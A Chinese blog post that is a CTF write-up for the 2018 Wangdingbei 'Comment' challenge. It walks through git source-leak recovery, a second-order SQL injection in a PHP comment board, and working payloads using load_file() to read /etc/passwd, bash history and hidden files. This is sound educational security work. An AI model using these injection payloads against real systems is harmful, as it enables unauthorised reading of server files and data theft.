[网鼎杯 2018]Comment

最新推荐文章于 2022-04-01 18:08:22 发布
最新推荐文章于 2022-04-01 18:08:22 发布
阅读量491 收藏 2
点赞数
分类专栏: SQL注入
DMIND
本文链接:https://blog.csdn.net/weixin_45669205/article/details/115973178
版权
本文介绍了通过SQL二次注入利用写入的恶意代码,结合Git源码泄露,恢复特定版本并读取系统文件/etc/passwd,进一步获取敏感信息的过程。讲解了如何通过write_do.php中的漏洞构造payload,读取/root/.bash_history揭示更多线索,最终找到并读取到flag文件内容。
摘要由CSDN通过智能技术生成

前言:

这是一道蛮有意思的题目,首先是有关Git的一些命令自己基本不懂,再之这是一道SQL二次注入的题目,可以通过读取/etc/passwd文件的方式追溯flag文件,长见识的一道题

文章目录

Git源码泄露

在这里插入图片描述
提示git源码泄露,用工具也确实能得到一个php文件,但文件内容不完整,这里卡住不会操作了,看师傅们是git log --relog恢复日志,然后git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c恢复到相应版本

git的一些基础命令
python GitHack.py http://xxx.com/.git/

git log                            //查看日志
git log --relog                    //恢复日志
git reset --hard  版本号         //就是回退到该版本号上。				

git diff         		        //进行差异比较

git reset --hard 82af46      //切换到add flag之后的文件

git checkout    			  //输出文件查询

git stash list                 //查看堆栈内保存的内容

git stash pop   			 //弹出堆栈中的文件

git stash apply        		  //恢复文件

git ls-files           		   //查看隐藏文件

git ls-files -s -- 3012131234.txt          //查看文件id

git cat-file -p c47d3a         //查看文件内容

git show  					//显示各种类型的文件
git switch master 				//切换树

但自己的githack怎么也恢复不出正确的版本号…所以直接就看师傅们的源码了

源码分析
//write_do.php
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

就是一个二次注入。当do=write时三个参数都被addslashes()处理,然后存进数据库,当do=comment时,$category是从数据库中来的,其他参数都会被addslashes()处理但数据库来的可就没有这个限制。

构造的payload十分巧妙:

//do=write:
title=aa&category=b',content=user(),/*&content=cc

//do=comment:
content=*/%23&bo_id=18

因为留言功能只回显conten的内容,所以我们要让conten等于我们要的内容。
b',content=user(),/*被完整地传入content。然后在do=comment时,这段语句结合content=*/#注释掉题目的语句
放在SQL中就是:,清楚看到第二行的conten=被注释了,取而代之是我们自己输入的conten=user()

insert into comment
            set category = 'b',content=user(),/*',
                content = '*/#',
                bo_id = '$bo_id'";
利用方式

这里我原本想着是爆表名、字段名…确实有点繁琐,看到师傅们是利用读取/etc/passwd这个文件发现作者有未清理而所留下的信息。这个是我完全没想到的姿势,学习一下这种姿势

load_file()读取/etc/passwd:

content=(select load_file('/etc/passwd')),/*
/etc/passwd的字段解释:

在这里插入图片描述

root:x:0:0:root:/root:/bin/bash 
第一个是用户名
第二个是密码,x只是作为占位符,真正的密码在/etc/shadow
第三个是用户ID ,是Linux系统中惟一的用户标识,用于区别不同的用户。0代表超级用户root,1~499代表管理用户admin,500以后是普通用户
第四个是组ID,在/etc/group文件中指明一个组所包含用户
第五个是描述信息,包含有关用户的一些信息,如用户的真实姓名、办公室地址、联系电话等。
第六个是用户主目录。root的主目录是/root,用户的主目录是/home/[username]/
第七个是用户的shell,通常是一个Shell程序的全路径名

www:x:500:500:www:/home/www:/bin/bash

通过第三位的用户ID可知www是普通用户,也就是我们所操纵的用户,该用户shell是在/bin/bash下
在这里插入图片描述

/root/.bash_history会保存 使用bash这个shell所执行的命令 历史记录
不仅如此,还有/root/.zsh_history/root/.mysql_history

在这里插入图片描述
我们访问/root/.bash_history读取一下历史记录:

title=aa&category=b',content=(select load_file('/home/www/.bash_history')),/*&content=cc

读到:

cd /tmp/						进入/tmp目录
unzip html.zip				    解压html.zip
rm -f html.zip					删除压缩包
cp -r html /var/www/			复制文件夹道/var/www
cd /var/www/html/				进入目录
rm -f .DS_Store					删除.DS_Store	
service apache2 start			开启apache2服务

很明显,被删除的.DS_Store是有猫腻的,这个文件在/tmp/html文件夹下还没被删除,访问这里,需要hex()将结果16进制编码返回,不然没回显

title=aa&category=b',content=hex((select  load_file('/tmp/html/.DS_Store'))),/*&content=cc

得到:

flag_8946e1ff1ee3e40f.php

在这里插入图片描述
在这里插入图片描述

然后到/var/www/html目录下读文件:

title=aa&category=b',content=hex((select  load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*&content=cc
D.MIND
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
(一)Activiti 数据库25张表——流程历史记录表19(ACT_HI_COMMENT)
02-27 3482
ACT_HI_COMMENT 简介: 历史意见表 详细说明: 用于保存流程审核的批注信息。一般我们审批任务时,都会填写审批意见、审批时间、审批人等信息 表结构: mysql>5定义字段 字段名称 字段描述 数据类型 主键 为空 取值说明 ID_ ID_ varchar(64) √ 主键ID TYPE_ 类型 varchar(255) √ 类型:event(事件)comme...
BUUCTF之[网鼎杯 2018]Comment
m0_62107966的博客
09-15 959
BUUCTF之[网鼎杯 2018]Comment 输入:*/# sql语句是换行的,所以我们无法用 单行注释符,必须用/**/拼接,用#闭合sql语句使其执行。可以看到执行成功,返回ctf这个库。首先发帖的时候必须登录,爆破弱密码登录,得到666是满足的后三位密码的。是一个类似留言板的界面,考虑二次注入,并且有git源码泄露。接下来尝试sql语句注入都失败了,看了大佬的wp,用sql来读取文件。在cmment中,对于category的值从数据库取出来没有进行转义
buu-[网鼎杯 2018]Comment
qaq517384的博客
10-13 313
进入题目 发帖时提示要登录,密码用bp跑出来是666 然后这个发帖形式很像上一题的二次注入,先构造sql语句,后面在留言界面输出 稍微试了一下,有问题的都发不出留言 在f12控制台发现这样一句话后,在url后添加.git被403禁止了,说明有git泄露 githack载下来的源码跟没载一样 <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./l
网鼎杯2020朱雀组-web
ChenZIDu的博客
05-18 3025
nmap那题就基本命令然后还有一个别的方法。 nmap 源码 index.php <? require('settings.php'); set_time_limit(0); if (isset($_POST['host'])): if (!defined('WEB_SCANS')) { die('Web scans disabled'); } $host = $_POST['host']; if(stripos($host,'php')!==false){ di
comment hive_Hive中基本语法
weixin_39676021的博客
02-01 2895
1.Hive中数据库基本操作1.1 Create/Drop/Alter/Use Database```CREATE (DATABASE|SCHEMA) [IF NOT EXISTS] database_name[COMMENT database_comment][LOCATION hdfs_path][WITH DBPROPERTIES (property_name=property_value,...
pgsql之Comment命令
深海微澜
11-01 5015
参考 Comment命令:定义或者改变一个对象的评注 语法: COMMENT ON { TABLE object_name | COLUMN table_name.column_name | AGGREGATE agg_name (agg_type [, ...] ) | CAST (sourcetype AS targettype) | CONSTRAINT cons...
审计练习14——[网鼎杯 2018]Comment
qq_43756333的博客
06-06 386
平台:buuoj.cn 打开靶机是个留言板 发帖需要登录,只缺密码的后三位,burp爆破即可 扫下目录 git泄露,githacker源码下下来 write_do.php 显示不全 历史文件恢复一下 完整代码如下 <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./login.php"); die(); } if(isset($_GET[
[网鼎杯 2018]Comment 注入读取文件load_file
qq_54929891的博客
04-01 1499
记录一下做这道题的经历和思路 发帖的时候要进行账号登陆,里面暗示了账号以及部分密码,后面的三个***我们采用爆破来进行
网鼎杯2018 comment
weixin_44377940的博客
03-20 2263
本次知识点 git恢复文件 二次注入 git恢复文件 如何判断是否可以恢复? 看是否有commit文件,如果没有,则需要恢复,像这题: 可以看到,
[网鼎杯 2018]Comment(二次注入,git泄露,git恢复)
qq_45521281的博客
04-12 3202
进入题目是这样的 要发帖还必须登录 在这里已经给了你用户名并提示了密码;密码隐藏了后三位,我们可以用爆破爆破后面三位的方法: 由爆破状态码的密码后三位为666,登录进去就可以发帖了。接下来用dirsearch扫描,发现存在.git文件 那应该存在.git文件泄露,用GitHack下载发现有一个write_do.php,但是代码有缺失 查一下之前提交的版本,单独用git log不能全部显示,直...
sql COMMENT
最新发布
09-12
SQL COMMENT 是用于在 SQL 查询或表中添加注释的语法。它可以帮助开发者和数据库管理员更好地理解和维护数据库对象。在 SQL 查询中,可以使用 COMMENT 关键字来添加注释,格式如下: ``` SELECT column_name FROM ...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值